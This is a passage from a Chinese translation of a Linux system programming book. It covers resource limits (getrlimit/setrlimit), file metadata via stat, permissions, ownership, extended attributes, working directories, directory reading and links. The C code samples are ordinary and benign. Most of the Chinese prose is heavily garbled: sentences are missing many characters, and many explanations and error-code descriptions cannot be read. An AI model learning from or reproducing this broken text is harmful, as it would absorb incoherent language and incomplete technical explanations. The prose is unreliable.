RLIMIT CORE 0内内存文件。相示存对
的。内 RLIM INFINITY 示 -1 (能
调 -1 相)。 RLIMIT CORE 内以
小的内存文件。
getrlimit() rlim 的 resource 的。
0 -1设。
相对的 setrlimit() rlim 的设 resource 的。
0内更新对的 -1设。
6.6.1 限制列表
Linux 提 15 :
• RLIMIT AS
进程空间上单。空间小超 — 调
mmap() brk() — ENOMEM。进程的自超
内将给进程 SIGSEGV 。的 RLIM INFINITY。
• RLIMIT CORE
内存文件小的单。 0超出的内存文件
将小 0将文件。
• RLIMIT CPU
进程以的 CPU 时间单。进程时间超出
将处理内出的 SIGXCPU 。程
时 POSIX 内的步作。进程然
Linux 进程给进程 SIGXCPU 。
进程将 SIGKILL 。
• RLIMIT DATA
进程段的小单。 brk() 扩段以超出
将 ENOMEM。
• RLIMIT FSIZE
文件以的文件单。进程扩展文件超出内
将 SIGXFSZ 。将进程。进程以
调 EFBIG 时自处理。
• RLIMIT LOCKS
进程以的文件的 (文件的)。
何的 ENOLCK。 Linux 2.4.25 内
能内以设何作。
• RLIMIT MEMLOCK
CAP SYS IPC 能的进程 ( root 进程) mlock() mlockall() 或
shmctl() 能 的 内 存 的 。 超 的 时 调
EPERM。实上实内存页。 CAP SYS IPC 能
的进程以的内存页效。 2.6.9 内
作 CAP SYS IPC 能的进程进程能内存页。
属 POSIX BSD 。
• RLIMIT MSGQUEUE
以 POSIX 的。新的超出
mp open() ENOMEM。属 POSIX 2.6.8 内
Linux 。
• RLIMIT NICE
进程以 nice (提) 的。文进程能
提 ()。理进程以提
的。 nice 能内 20 − rlim cur 示。
设 40进程 -20()。 2.6.12 内
。
• RLIMIT NOFILE
进程以的文件。何超出的
EMFILE。 BSD RLIMIT OFILE。
• RLIMIT NPROC
时的进程。何超出的 fork()
EAGAIN。属 POSIX BSD 。
• RLIMIT RSS
进程以内存的页 (即集小 RSS)。的 2.4 内
内设。属 POSIX BSD
。
• RLIMIT RTPRIO
CAP SYS NICE 能的进程以的实时。进
程实时调。属 POSIX 2.6.12 内 Linux
。
• RLIMIT SIGPENDING
。更的将 sigqueue() 的调
将 EAGAIN。以将的实
. 以进程 SIGKILL SIGTERM 。
属 POSIX Linux 。
• RLIMIT STACK
的。超出将 SIGSEGV 。
内以进程单理。子进程 fork 的时进程
exec 进。
6.6.1.1 默认限制
: 理。内
。内 init 进程设
子进程间的给的子进程。
Resource limit        Soft limit              Hard limit
RLIMIT_AS             RLIM_INFINITY           RLIM_INFINITY
RLIMIT_CORE           0                       RLIM_INFINITY
RLIMIT_CPU            RLIM_INFINITY           RLIM_INFINITY
RLIMIT_DATA           RLIM_INFINITY           RLIM_INFINITY
RLIMIT_FSIZE          RLIM_INFINITY           RLIM_INFINITY
RLIMIT_LOCKS          RLIM_INFINITY           RLIM_INFINITY
RLIMIT_MEMLOCK        8 pages                 8 pages
RLIMIT_MSGQUEUE       800 KB                  800 KB
RLIMIT_NICE           0                       0
RLIMIT_NOFILE         1024                    1024
RLIMIT_NPROC          0 (implies no limit)    0 (implies no limit)
RLIMIT_RSS            RLIM_INFINITY           RLIM_INFINITY
RLIMIT_RTPRIO         0                       0
RLIMIT_SIGPENDING     0                       0
RLIMIT_STACK          8 MB                    RLIM_INFINITY
以:
• 何进程以 0 的内以
子进程以 fork 。
• 进程以设子进程同以 fork
。
进程的 root 进程能何
更能的原。实上对进程的 shell
设理以进设提的。 Bourne-again
shell(bash) 理以 ulimit 设。理以
以提给提更理的。
RLIMIT STACK(上设 RLIM INFINITY) 进处理。
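基于这些默认值，服务器程序启动时的一项常见工作是把某个软限制提高到硬限制，例如可打开文件数。下面是一个示意（函数名为笔者所取；把软限制提高到不超过硬限制无需任何特权）：

```c
#include <sys/resource.h>

/* Raise the soft limit on open file descriptors to the hard
 * limit. Raising soft up to hard never requires privilege.
 * Returns 0 on success, -1 on failure. */
int maximize_nofile (void)
{
        struct rlimit rlim;

        if (getrlimit (RLIMIT_NOFILE, &rlim) == -1)
                return -1;
        rlim.rlim_cur = rlim.rlim_max;
        return setrlimit (RLIMIT_NOFILE, &rlim);
}
```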
6.6.2 获取和设置资源限制
我们设。
单:
struct rlimit rlim;
int ret;

/* get the limit on core sizes */
ret = getrlimit (RLIMIT_CORE, &rlim);
if (ret == -1) {
        perror ("getrlimit");
        return 1;
}

printf ("RLIMIT_CORE limits: soft=%ld hard=%ld\n",
        rlim.rlim_cur, rlim.rlim_max);
然将:
RLIMIT_CORE limits: soft=0 hard=-1
以 0 -1(-1 )。我们以设
。的子设内存文件 32MB:
struct rlimit rlim;
int ret;

rlim.rlim_cur = 32 * 1024 * 1024;  /* 32 MB */
rlim.rlim_max = RLIM_INFINITY;     /* leave it alone */
ret = setrlimit (RLIMIT_CORE, &rlim);
if (ret == -1) {
        perror ("setrlimit");
        return 1;
}
6.6.2.1 错误码
能:
EFAULT rlim 的内存或。
EINVAL resource 的或 rlim.rlim cur 的 rlim.rlim max(
setrlimit())。
EPERM
调 CAP SYS RESOURCE 能提。
第 7 章
文件与目录管理
2 3 以及 4 我们给出文件 I/O 的方调。
我们上的文件读写操作
理文件及。
7.1 文件及其元数据
我们 1 的文件对 inode文件
( inode 。 inode unix 文件的理对
Linux 内的实。 inode 存文件的
文件的时间小以及文件
的存。
能 ls 的 -i 文件 inode
$ ls -i
1689459 Kconfig     1680137 Makefile    1680138 console.c   1689460 disk.c
1689461 main.c      1680141 pm.c        1689462 power.h     1680143 poweroff.c
1680144 process.c   1680145 smp.c       1689463 snapshot.c  1680147 swap.c
1689464 swsusp.c    1680149 user.c
出示文件 disk.c 的 inode 1689460。文件
何文件 inode (inode number)。文件
我们能同的 inode 。
7.1.1 一组 stat 函数
Unix 提文件的
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
int stat (const char *path, struct stat *buf);
int fstat (int fd, struct stat *buf);
int lstat (const char *path, struct stat *buf);
文件的。 stat() path 的文件
fstat() 文件 fd 的文件。 lstat() stat()
对 lstat() 文件。
stat 存的文件。 stat <bits/stat.h>
真的 <sys/stat.h> 的
struct stat {
        dev_t st_dev;            /* ID of device containing file */
        ino_t st_ino;            /* inode number */
        mode_t st_mode;          /* permissions */
        nlink_t st_nlink;        /* number of hard links */
        uid_t st_uid;            /* user ID of owner */
        gid_t st_gid;            /* group ID of owner */
        dev_t st_rdev;           /* device ID (if special file) */
        off_t st_size;           /* total size in bytes */
        blksize_t st_blksize;    /* blocksize for filesystem I/O */
        blkcnt_t st_blocks;      /* number of blocks allocated */
        time_t st_atime;         /* last access time */
        time_t st_mtime;         /* last modification time */
        time_t st_ctime;         /* last status change time */
};
对段的
• 段 st dev 文件设备上(我们将设
备。文件设备上文件文件 (NFS)
上 0。
• 段 st ino 文件的 inode 。
• 段 st mode 文件的段。 1 2
的内。
• 段 st nlink 文件的。文件。
• 段 st uid 文件的 ID。
• 段 st gid 文件属 ID。
• 文件设备段 st rdev 设备。
• 段 st size 提文件。
• 段 st blksize 进效文件 I/O 的小。(或
I/O 的小( 3 。
• 段 st blocks 给文件的。文件时(文件
文件将小 st size 。
• 段 st atime 文件时间。文件的时间(
read() 或 execle()。
• 段 st mtime 文件时间文件写的
时间。
• 段 st ctime 文件时间。段
Linux 或 Unix 的文件时间。段实上的文件的
(文件或的时间。
时调 0将文件存 stat 。
时们 -1设 errno
EACCESS
调的进程对 path 的的的
( stat() lstat()。
EBADF
效的 fd( fstat()。
EFAULT
效的 path 或 buf 。
ELOOP
path ( stat() lstat()。
ENAMETOOLONG (path) ( stat() lstat()。
ENOENT
path 的 或 文 件 存 ( stat()
lstat()。
ENOMEM
内存。
ENOTDIR
path 的( stat() lstat()。
程 stat() 文件 (文件) 的小
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <stdio.h>

int main (int argc, char *argv[])
{
        struct stat sb;
        int ret;

        if (argc < 2) {
                fprintf (stderr, "usage: %s <file>\n", argv[0]);
                return 1;
        }

        ret = stat (argv[1], &sb);
        if (ret) {
                perror ("stat");
                return 1;
        }

        printf ("%s is %ld bytes\n", argv[1], sb.st_size);

        return 0;
}
程自文件上的
$ ./stat stat.c
stat.c is 392 bytes
以段 fstat() 的文件理(或相对
的设备上
/*
 * is_on_physical_device - returns a positive
 * integer if 'fd' resides on a physical device,
 * 0 if the file resides on a nonphysical or
 * virtual device (e.g., on an NFS mount), and
 * -1 on error.
 */
int is_on_physical_device (int fd)
{
        struct stat sb;
        int ret;

        ret = fstat (fd, &sb);
        if (ret) {
                perror ("fstat");
                return -1;
        }

        return gnu_dev_major (sb.st_dev);
}
7.1.2 权限
调 stat 给文件的调设
#include <sys/types.h>
#include <sys/stat.h>
int chmod (const char *path, mode_t mode);
int fchmod (int fd, mode_t mode);
chmod() fchmod() 设文件 mode。 chmod() path
的文件的相对或绝对。对 fchmod()文件文件 fd 给
。
mode t() 示的 mode stat 段 st mode
的。然单们对 Unix 实的
同的。以 POSIX 的集 ( 2 新文件的
)。能进或 mode 。 (S IRUSR |
S IRGRP) 同时设文件属的读。
文件的调 chmod() 或 fchmod() 的进程效 ID 文件
或进程 CAP FOWNER 能。
时 0。时 -1设 errno
EACCESS
调的进程对 path 的
( chmod()。
EBADF
效的文件 fd( fchmod()。
EFAULT
效的 path ( chmod()。
EIO
文件内 I/O 。的的
的或文件。
ELOOP
内 path 时( chmod()。
ENAMETOOLONG path ( chmod()。
ENOENT
path 存( chmod()。
ENOMEM
内存。
ENOTDIR
path ( chmod()。
EPERM
调的进程效 ID 文件进程
CAP FOWNER 能。
EROFS
文件读文件上。
段将文件 map.png 设读写
int ret;

/*
 * Set 'map.png' in the current directory to
 * owner-readable and -writable. This is the
 * same as 'chmod 600 ./map.png'.
 */
ret = chmod ("./map.png", S_IRUSR | S_IWUSR);
if (ret)
        perror ("chmod");
段上段能 fd 的文件 map.png
int ret;

/*
 * Set the file behind 'fd' to owner-readable
 * and -writable.
 */
ret = fchmod (fd, S_IRUSR | S_IWUSR);
if (ret)
        perror ("fchmod");
chmod() fchmod() 对 Unix 。 POSIX
。
7.1.3 所有权
stat 段 st uid st gid 提文件的属。以
调
#include <sys/types.h>
#include <unistd.h>

int chown (const char *path, uid_t owner, gid_t group);
int lchown (const char *path, uid_t owner, gid_t group);
int fchown (int fd, uid_t owner, gid_t group);
chown() lchown() 设 path 的文件的。们作
文件
的 lchown() 文件的
。 fchown() 设文件 fd 的文件。
时调设文件 owner设文件属
group 0。段 owner 或 group -1设。
CAP CHOWN 能的进程( root 进程能文件的。文件
以将文件属设何属 CAP CHOWN 能的进程
能文件属何。
时调 -1设 errno
EACCESS
调的进程对 path 的(
chown() lchown()。
EBADF
效的 fd( fchown()。
EFAULT
效的 path( chown() lchown()。
EIO
内 I/O ()。
ELOOP
内 path 时( chown()
lchown()。
ENAMETOOLONG path ( chown() lchown())。
ENOENT
文件存。
ENOMEM
内存。
ENOTDIR
path 的 ( chown()
lchown()。
EPERM
调的进程的或
属。
EROFS
读的文件。
段工作文件 manifest.txt 的属 officers。
操作调的备 CAP CHOWN 能或 kidd
officers
struct group *gr;
int ret;

/*
 * getgrnam() returns information on a group
 * given its name.
 */
gr = getgrnam ("officers");
if (!gr) {
        /* likely an invalid group */
        perror ("getgrnam");
        return 1;
}

/* set manifest.txt's group to 'officers' */
ret = chown ("manifest.txt", -1, gr->gr_gid);
if (ret)
        perror ("chown");
操作文件属 crew
$ ls -l
-rw-r--r-- 1 kidd crew 13274 May 23 09:20 manifest.txt
操作 officers 以
$ ls -l
-rw-r--r-- 1 kidd officers 13274 May 23 09:20 manifest.txt
文件的 kidd -1 给 uid。以将
fd 的文件的设 root
/*
 * make_root_owner - changes the owner and group of the file
 * given by 'fd' to root. Returns 0 on success and -1 on
 * failure.
 */
int make_root_owner (int fd)
{
        int ret;

        /* 0 is both the gid and the uid for root */
        ret = fchown (fd, 0, 0);
        if (ret)
                perror ("fchown");

        return ret;
}
调的进程 CAP CHOWN 能。进程 CAP CHOWN
的能进程 root 。
7.1.4 扩展属性
扩展属性 (作 xattrs) 提文件 / 对相的
。我们文件的 / 的文件的
小时间。扩展属性文件设
实的新性出的的。扩展属性的
性空间能读写 / 。
扩展属性文件的程操作们
对文件。程扩展属性时文
件的文件或文件何内存。扩展属性的实
文件相的。同的文件以同的方式存扩展属性内
们扩展属性出。
ext3 文件文件 inode 的空空间存扩展属性。∗性
读文件属性。何时程文件 inode 的文件
读内存扩展属性自读内存时
的。
文件 FAT minixfs扩展属性。对上的文
件调扩展属性时文件 ENOTSUP。
7.1.4.1 键与值
扩展属性对的 (key)。的 UTF-8 。
们 namespace.attribute 的式。
效的空间。效的的子
user.mime type的空间 user属性 mime type。
能或。能空或
空。的间的。我
们的的(空
的。
相的空能的。
以’\0’ C 存时以’\0’
理。然以’\0’ 对扩展属性的操作的。读
属性时内提写属性时提属性。
∗然 inode 空间 ext3 的文件存扩展属性。更的 ext3
”inode 内” 的扩展属性性。
存 MIME 的更方式
GUI 文件理 GNOME’s Nautilus对同的文件同处理
同的同、同的操作。实文
件理文件的式。文件式 Windows 文件
单文件的扩展。出的原 Unix
文件。进程作 MIME (MIME type
sniffing。
文件理时理存
。存的自的。文件理文件
文件理的同步。的方自
的扩展属性存的更单
更何程。
Linux 对的的的小或文件相的
的空间小上何。文件上实的。
给文件相的的上。
ext3对给文件的扩展属性文件 inode 的空间
的文件小。(更的 ext3 文件
inode 内存。文件的小相
文件实 1KB 8KB。 XFS 实。
的文 ext3 。文
件扩展属性存的
7.1.4.2 扩展属性命名空间
扩展属性相的空间的工。空间内
同。
Linux 扩展属性空间能将更。
system
空 间 system 扩 展 属 性 实 内 性
(ACLs)。空间扩展属性的子 system.posix_acl_access。读或写属性相
的。的( root能读
属性。
security 空间 security 实 SELinux。空间程
属性相的。进程能
读属性 CAP SYS ADMIN 能的进程能写们。
trusted
空间 trusted 存空间的。 CAP SYS ADMIN
能的进程能读写属性。
user
空间 user 进程的空间。内文件
空间。存的读进程给
文件的读。新或的写进程
给文件的写。能对文件空间扩展属性
或设备文件以。设能扩展属性的空间
程时的空间。
7.1.4.3 扩展属性操作
POSIX 程对给文件扩展属性的操作
• 给文件相的。
• 给文件对。
• 给文件文件的扩展属性的。
• 给文件文件扩展属性。
对操作 POSIX 提调
• 操作给的调的文件
操作(。
• 操作给的调操
作(以”l” 的调。
• 操作文件的调(以”f” 的调。
我们将 12 。
扩展属性。单的操作文件扩展属性给的
#include <sys/types.h>
#include <attr/xattr.h>
ssize_t getxattr (const char *path, const char *key,
                  void *value, size_t size);
ssize_t lgetxattr (const char *path, const char *key,
                   void *value, size_t size);
ssize_t fgetxattr (int fd, const char *key,
                   void *value, size_t size);
getxattr() 调将 path 的文件 key 的扩展属性
存 value 的 size 。的实
小。
size 0调 的 小 将 存 value。
0以程存的的。
小程或调。
lgetxattr() getxattr() 。时的
文件的扩展属性。的我们
空间的属性能上。调。
fgetxattr() 操作文件 fd方 getxattr() 。
时调 -1设 errno
EACCESS
调的进程对 path 的(
getxattr() lgetxattr()。
EBADF
效的 fd( fgetxattr()。
EFAULT
效的 path, key 或 value 。
ELOOP
path ( getxattr() lgetx-
attr())。
ENAMETOOLONG path ( getxattr() lgetxattr()。
ENOATTR
属性 key 存或进程属性的。
ENOENT
path 的存( getxattr() lgetx-
attr()。
ENOMEM
内存。
ENOTDIR
path 的( getxattr()
lgetxattr()。
ENOTSUP
path 或 fd 的文件扩展属性。
ERANGE
size 小存。的调
能将 size 设 0将的存小对
value 调。
设扩展属性。调设给的扩展属性
#include <sys/types.h>
#include <attr/xattr.h>
int setxattr (const char *path, const char *key,
              const void *value, size_t size, int flags);
int lsetxattr (const char *path, const char *key,
               const void *value, size_t size, int flags);
int fsetxattr (int fd, const char *key,
               const void *value, size_t size, int flags);
setxattr() 设置文件 path 的扩展属性 key 的值为 value，value 的长度为 size
。段 flags 调的。 flags XATTR CREATE扩展属性
存时调将。 flags XATTR REPLACE扩展属性存时调
将。的 flags 0 时同时。 flags
的 key 对。
lsetxattr() setxattr() path 设
文件的扩展属性。的我们
空间的属性能上。调。
fsetxattr() 操作文件 fd方 setxattr() 。
时调 0时调 -1设
errno
EACCESS
调的进程对 path 的(
setxattr() lsetxattr()。
EBADF
效的 fd( fsetxattr()。
EDQUOT
操作空间。
EEXIST
flags 设 XATTR CREATE给文件的 key 存
。
EFAULT
效的 path, key 或 value 。
EINVAL
效的 flags。
ELOOP
path ( setxattr() lsetx-
attr()。
ENAMETOOLONG path ( setxattr() lsetxattr()。
ENOATTR
flags 设 XATTR REPLACE给的文件存
key。
ENOENT
path 的存( setxattr() lsetx-
attr()。
ENOMEM
内存。
ENOSPC
文件空间存扩展属性。
ENOTDIR
path ( setxattr() lsetx-
attr()。
ENOTSUP
path 或 fd 的文件扩展属性。
出文件的扩展属性。调出给文件扩展属性集
#include <sys/types.h>
#include <attr/xattr.h>
ssize_t listxattr (const char *path, char *list,
                   size_t size);
ssize_t llistxattr (const char *path, char *list,
                    size_t size);
ssize_t flistxattr (int fd, char *list,
                    size_t size);
调 listxattr(), path 的文件相的扩展属性
。存 list 的 size 的。调的
实小。
list 的扩展属性以’\0’ 的能
"user.md5_sum\0user.mime_type\0system.posix_acl_default\0"
然的、以’\0’ 的 C
的(能调的。
的小设 size 0 调的将
的实。调 getxattr() 程能能
或调。
llistxattr() listxattr() path 时出
文件相的扩展属性。以的
空间的属性能调。
flistxattr() 操作文件 fd方 listxattr() 。
时调 -1设 errno
EACCESS
调的进程对 path 的(
listxattr() llistxattr()。
EBADF
效的 fd( flistxattr()。
EFAULT
效的 path 或 list 。
ELOOP
path 。( listxattr()
llistxattr()。
ENAMETOOLONG path ( listxattr() llistxattr()。
ENOENT
path 的存( listxattr() llistx-
attr()。
ENOMEM
内存。
ENOTDIR
path ( listxattr() llistx-
attr()。
ENOTSUPP
path 或 fd 的文件扩展属性。
ERANGE
size 零小存。程能
设 size 0调的实小。程能
value新调调。
扩展属性。调给文件给
#include <sys/types.h>
#include <attr/xattr.h>
int removexattr (const char *path, const char *key);
int lremovexattr (const char *path, const char *key);
int fremovexattr (int fd, const char *key);
调 removexattr() 文件 path 扩展属性 key。
空的(零的。
lremovexattr() removexattr() path
文件的扩展属性。空间的属性能
调。
fremovexattr() 操作文件 fd方 removexattr() 。
时调 0。时调 -1
设 errno
EACCESS
调的进程对 pat 的(
removexattr() lremovexattr()。
EBADF
效的 fd( fremovexattr()。
EFAULT
效的 path 或 key 。
ELOOP
path 。( removexattr()
lremovexattr()。
ENAMETOOLONG path ( removexattr() lremovexattr()。
ENOATTR
给文件存 key。
ENOENT
path 的存( removexattr()
lremovexattr()。
ENOMEM
内存。
ENOTDIR
path 的( removexattr()
lremovexattr()。
ENOTSUPP
path 或 fd 的文件扩展属性。
7.2 目录
Unix单的文件的文件对
inode 。文件 inode 的映射。
内(的 ls 的文件。
的文件时内文件对的 inode
。然内将 inode 给文件文件文件设
备上的理。
能。子的。
文件真的 / 的子。
( root 的 /root 。
文件及或。绝对以
的 /usr/bin/sextant。相对以的
bin/sextant。的效操作的相对。
工作(作。
文件能(delineate的/
的 null 以的。的
效,ASCII 。内 C 的
程效。
的 Unix 文件 14 。 Unix 文件
文件 255 。∗Linux 文件更的
文件。†
7.2.1 当前工作目录
进程时进程的。
的进程工作(cwd。工作内相对时的
。进程的工作 /home/blackbeard进程
parrot.jpg内将 /home /blackbeard/parrot.jpg。相进程
/usr/bin/mast, 内将 /usr/bin/mast工作对绝对
(以 / 的。
进程以及更工作。
7.2.1.1 获取当前工作目录
工作的方 POSIX 的调 getcwd()
#include <unistd.h>
char * getcwd (char *buf, size_t size);
调 getcwd( ) 以绝对式工作 buf
的 size 的 buf 的。时调
NULL设 errno
∗ 255 255 。然。
†然 Linux 提对的文件提性 FAT然们自的
。对 FAT”.”。的文件
.作的。
EFAULT
效的 buf 。
EINVAL
size 0 buf NULL。
ENOENT 工作效。工作时。
ERANGE size 小将工作存 buf。程更
的。
getcwd() 的子
char cwd[BUF_LEN];

if (!getcwd (cwd, BUF_LEN)) {
        perror ("getcwd");
        exit (EXIT_FAILURE);
}
printf ("cwd = %s\n", cwd);
POSIX 出 buf NULL getcwd() 的的。
Linux 的 C 将 size 的存工作
。 size 0 C 将小的存工作。调
程 free() 。 Linux 的处理方
式或 POSIX 的程方式。
性的单子
char *cwd;

cwd = getcwd (NULL, 0);
if (!cwd) {
        perror ("getcwd");
        exit (EXIT_FAILURE);
}
printf ("cwd = %s\n", cwd);
free (cwd);
Linux 的 C 提 get current dir name( ) buf Null size
0 时 getcwd( )
#define _GNU_SOURCE
#include <unistd.h>
char * get_current_dir_name (void);
的相同
char *cwd;

cwd = get_current_dir_name ( );
if (!cwd) {
        perror ("get_current_dir_name");
        exit (EXIT_FAILURE);
}
printf ("cwd = %s\n", cwd);
free (cwd);
的 BSD 喜调 getwd() Linux 对提
#define _XOPEN_SOURCE_EXTENDED /* or _BSD_SOURCE */
#include <unistd.h>
char * getwd (char *buf);
调 getwd(工作 PATH MAX 的 buf。
时调 buf 时 NULL。
char cwd[PATH_MAX];

if (!getwd (cwd)) {
        perror ("getwd");
        exit (EXIT_FAILURE);
}
printf ("cwd = %s\n", cwd);
出性性的原程 getwd()
getcwd()。
7.2.1.2 更改当前工作目录
时进程 login 设工作 /etc/passwd
的。时进程更工作。 cd
时 shell 工作。
Linux 更工作提调
的文件
#include <unistd.h>
int chdir (const char *path);
int fchdir (int fd);
调 chdir() 更工作 path 的绝对或相对
以。同调 fchdir() 更工作文件 fd 的
fd 的。时调 0。时 -1。
时 chdir() 设 errno
EACCESS
调的进程对 path 的。
EFAULT
效的 path 。
EIO
内 I/O 。
ELOOP
内 path 时。
ENAMETOOLONG path 。
ENOENT
path 的存。
ENOMEM
内存。
ENOTDIR
path 的或。
fchdir() 设 errno
EACCESS 调的进程对 fd 的的(设
。读时出
。 open() fchdir() 。
EBADF
fd 的文件。
对同的文件调能的。
调对进程。 Unix 更同进程工
作的。 shell 的 cd 的进程(
chdir() 出。 shell
调 chdir() 工作 cd 内。
getcwd() 存工作进程能。
char *swd;
int ret;

/* save the current working directory */
swd = getcwd (NULL, 0);
if (!swd) {
        perror ("getcwd");
        exit (EXIT_FAILURE);
}

/* change to a different directory */
ret = chdir (some_other_dir);
if (ret) {
        perror ("chdir");
        exit (EXIT_FAILURE);
}

/* do some other work in the new directory... */

/* return to the saved directory */
ret = chdir (swd);
if (ret) {
        perror ("chdir");
        exit (EXIT_FAILURE);
}

free (swd);
open() 调 fchdir()方更。内内
存存工作的存 inode以方更。
何时调 getcwd()内。相
工作的更内 inode,
文件。的方
int swd_fd;

swd_fd = open (".", O_RDONLY);
if (swd_fd == -1) {
        perror ("open");
        exit (EXIT_FAILURE);
}

/* change to a different directory */
ret = chdir (some_other_dir);
if (ret) {
        perror ("chdir");
        exit (EXIT_FAILURE);
}

/* do some other work in the new directory... */

/* return to the saved directory */
ret = fchdir (swd_fd);
if (ret) {
        perror ("fchdir");
        exit (EXIT_FAILURE);
}

/* close the directory's fd */
ret = close (swd_fd);
if (ret) {
        perror ("close");
        exit (EXIT_FAILURE);
}
shell 存以的方( bash cd。
工作的进程(进程调 chdir(”/”) 设
工作 /。及及的程 (文处
理) 设工作或的文。工
作相对相更工作 shell 调的
实工实的。
7.2.2 创建目录
Linux 新提的 POSIX 调
#include <sys/stat.h>
#include <sys/types.h>
int mkdir (const char *path, mode_t mode);
调 mkdir() path(能相对或绝对
mode( umask 0。
umask 以方式 mode操作的式进
Linux新的(mode & ˜umask & 01777。
umask 进程的 mkdir() 的。新的设
的 ID(sgid设或文件以 BSD 的方式新将
属。进程效 ID 将新。
调时 mkdir() -1设 errno
EACCESS
进程对写或 path 的或
。
EEXIST
path 存(的。
EFAULT
效的 path 。
ELOOP
内 path 时。
ENAMETOOLONG path 。
ENOENT
path 存或空的。
ENOMEM
内存。
ENOSPC
path 的设备空间或超。
ENOTDIR
path 的或。
EPERM
path 的文件。
EROFS
path 的文件读。
7.2.3 移除目录
mkdir() 对的 POSIX 调 rmdir() 将文件上
#include <unistd.h>
int rmdir (const char *path);
调时 rmdir() 文件 path 0。. ..
path 的空。调实 rm -r 的能。
的工文件文件
文件内的文件时以 rmdir()
。
调时 rmdir() -1设 errno
EACCESS
写 path 的或 path 的
。
EBUSY
path。 Linux path
或( chroot( )时
能。
EFAULT
效的 path 。
EINVAL
path 的”.” 。
ELOOP
内 path 时。
ENAMETOOLONG path 。
ENOENT
path 存或效的。
ENOMEM
内存。
ENOTDIR
path 的或。
ENOTEMPTY
path 的. .. 。
EPERM
path 的的(S ISVTX设进程
效 ID path 的 ID进
程 CAP FOWNER 能。以上原
path 的文件的。
EROFS
path 的文件以读方式。
单的子
int ret;

/* remove the directory /home/barbary/maps */
ret = rmdir ("/home/barbary/maps");
if (ret)
        perror ("rmdir");
7.2.4 读取目录内容
POSIX 读内的以
的文件。实 ls 或的文件存对时操
作给文件或给式的文件时
。
读内 DIR 对的
#include <sys/types.h>
#include <dirent.h>
DIR * opendir (const char *name);
调 opendir() name 的。
的文件存的内的
存内的。以给
的文件
#define _BSD_SOURCE /* or _SVID_SOURCE */
#include <sys/types.h>
#include <dirent.h>
int dirfd (DIR *dir);
调 dirfd() dir 的文件。时调 -1。
能内文件程能调操作文件
的调。 dirfd() BSD 的扩展 POSIX POSIX
的程。
7.2.4.1 从目录流读取
opendir() 程以读。
readdir()以给 DIR 对
#include <sys/types.h>
#include <dirent.h>
struct dirent * readdir (DIR *dir);
调 readdir() dir 的。 dirent 。
Linux 的 <dirent.h>
struct dirent {
        ino_t d_ino;                /* inode number */
        off_t d_off;                /* offset to the next dirent */
        unsigned short d_reclen;    /* length of this record */
        unsigned char d_type;       /* type of file */
        char d_name[256];           /* filename */
};
POSIX 段 d name段内单文件。段
的或 Linux 的。将程或 POSIX
的程 d name。
程调 readdir()文件们们的
文件或读时 readdir() NULL。
时 readdir() NULL。读文件程
调 readdir() 将 errno 设 0 errno。
readdir() 设的 errno EBADF效的 dir。对程
NULL 读。
7.2.4.2 关闭目录流
closedir() opendir() 的
#include <sys/types.h>
#include <dirent.h>
int closedir (DIR *dir);
调 closedir() dir 的的文件
0。时 -1设 errno EBADF能的
dir 的。
实 find file in dir() readdir() 给
文件。文件存 0。零
/*
 * find_file_in_dir - searches the directory 'path' for a
 * file named 'file'.
 *
 * Returns 0 if 'file' exists in 'path' and a nonzero
 * value otherwise.
 */
int find_file_in_dir (const char *path, const char *file)
{
        struct dirent *entry;
        int ret = 1;
        DIR *dir;

        dir = opendir (path);

        errno = 0;
        while ((entry = readdir (dir)) != NULL) {
                if (!strcmp (entry->d_name, file)) {
                        ret = 0;
                        break;
                }
        }

        if (errno && !entry)
                perror ("readdir");

        closedir (dir);
        return ret;
}
7.2.4.3 用于读取目录内容的系统调用
的读内的 C 提的 POSIX 。
内调 readdir() getdents()内更给
出调
#include <unistd.h>
#include <linux/types.h>
#include <linux/dirent.h>
#include <linux/unistd.h>
#include <errno.h>
/*
 * Not defined for user space: need to
 * use the _syscall3( ) macro to access.
 */
int readdir (unsigned int fd, struct dirent *dirp,
             unsigned int count);
int getdents (unsigned int fd, struct dirent *dirp,
              unsigned int count);
调们。
空间程 C 的调 opendir(), readdir() closedir()。
7.3 链接
的, inode 的映射。
单的上( inode 的
inode 的的。单 inode(或
单文件以同时 /etc/customs /var/run/ledger 。
子的映射 inode同文件
的 inode 同的 /etc/customs /var/run/ledger 同文件
。文件文件的以。的示
的的。或的
。同文件文件。
我们的。文件以零或
。文件 1 文件文件
能或。 0 的文件文件上对的
。文件 0 时文件空。∗进
程文件时文件文件。进程文
件文件。
∗ 0 的文件文件工 fsck 的工作。的
文件然文件。内能文
件空以。文件以。
Linux 内进理。文件
的实的。文件 0 时文件
。
文件文件 inode 的映射
时的更的。文件我们将
。
7.3.1 硬链接
作的 Unix 调 link() POSIX 我们以
link() 存文件的新
#include <unistd.h>
int link (const char *oldpath, const char *newpath);
调 link() 存的文件 oldpath nwepath 的新
0。 oldpath newpath 同文件实上我们
” ” 。
时调 -1设 errno
EACCESS
调的进程对 oldpath 的或
对 newpath 的写。
EEXIST
newpath 存 link() 将存的。
EFAULT
效的 oldpath 或 newpath 。
EIO
内 I/O (。
ELOOP
oldpath 或 newpath 时。
EMLINK
oldpath 的 inode 的。
ENAMETOOLONG oldpath 或 newpath 。
ENOENT
oldpath 或 newpath 存。
ENOMEM
内存。
ENOSPC
newpath 的设备新的空间。
ENOTDIR
oldpath 或 newpath 。
EPERM
newpath 的文件新的或 old-
path 。
EROFS
newpath 读文件上。
EXDEV
newpath oldpath 同文件上。(Linux 单
文件方即能
。
子新 pirate的文件 privateer 同 in-
ode(即同文件 /home/kidd
int ret;

/*
 * create a new directory entry,
 * '/home/kidd/privateer', that points at
 * the same inode as '/home/kidd/pirate'
 */
ret = link ("/home/kidd/pirate",
            "/home/kidd/privateer");
if (ret)
        perror ("link");
7.3.2 符号链接
的 symlinks 或。的相同处
文件的文件的同的
的文件。文件的文件(
的。时内的
(调以”l” 的调 lstat()操作
文件。同文件的
文件。
能相对或绝对。以的的
”.” 或的”..” 。
的的以能文件。实
上以能存(或存的文
件。空的。时空的的
存的时。
– 237 –
7
文件理
的调相
#include <unistd.h>
int symlink (const char *oldpath, const char *newpath);
调 symlink() oldpath 的 newpath 0。
时 symlink() -1设 errno
EACCESS
调的进程对 oldpath 的或对
newpath 的写。
EEXIST
newpath 存 symlink( ) 将存的。
EFAULT
效的 oldpath 或 newpath 。
EIO
内 I/O ()。
ELOOP
oldpath 或 newpath 时。
EMLINK
oldpath 的 inode 的。
ENAMETOOLONG oldpath 或 newpath 。
ENOENT
oldpath 或 newpath 存。
ENOMEM
内存。
ENOSPC
newpath 的设备新的空间。
